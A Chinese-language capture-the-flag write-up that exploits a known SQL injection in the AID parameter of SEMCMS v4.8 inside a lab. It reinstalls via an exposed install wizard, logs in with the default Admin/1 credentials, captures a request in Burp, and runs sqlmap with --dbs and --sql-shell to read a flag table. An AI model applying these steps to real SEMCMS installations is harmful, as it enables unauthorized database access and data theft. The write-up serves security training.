靶标介绍:
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入

开启靶场:

开始实验:
1、使用后台扫描工具,发现“安装向导”

2、点击“install”链接,打开安装界面

3、点击“开始安装”,发现连接mysql错误:No such file or directory

4、修改“数据库服务器”为127.0.0.1,点击“开始安装”

返回连接数据库名 mycms 错误: Unknown database 'mycms',

5、修改“数据库名称”为:semcms,开始安装

安装成功


根据安装界面返回信息,得知后台默认帐户:Admin 密码:1
6、点击“点击转到后台”,打开后台登录界面,使用“帐户:Admin 密码:1”登录

登录成功

7、根据提示“该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入”,结合

8、进入“产品管理”-选购一款产品-“批量上架”,使用bp抓包


9、保存抓包文件为55.txt

10、使用sqlmap注入
sqlmap.py -r 55.txt --batch
发现存在注入

11、查找数据库
sqlmap.py -r 55.txt --dbs --batch

12、进入--sql-shell,搜索flag在哪个表里
sqlmap.py -r 55.txt --sql-shell
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'flag' limit 2,1
13、找到“flag”在“semcms数据库”的“flllaaaag表里”

14、搜索flag
select flag from flllaaaag
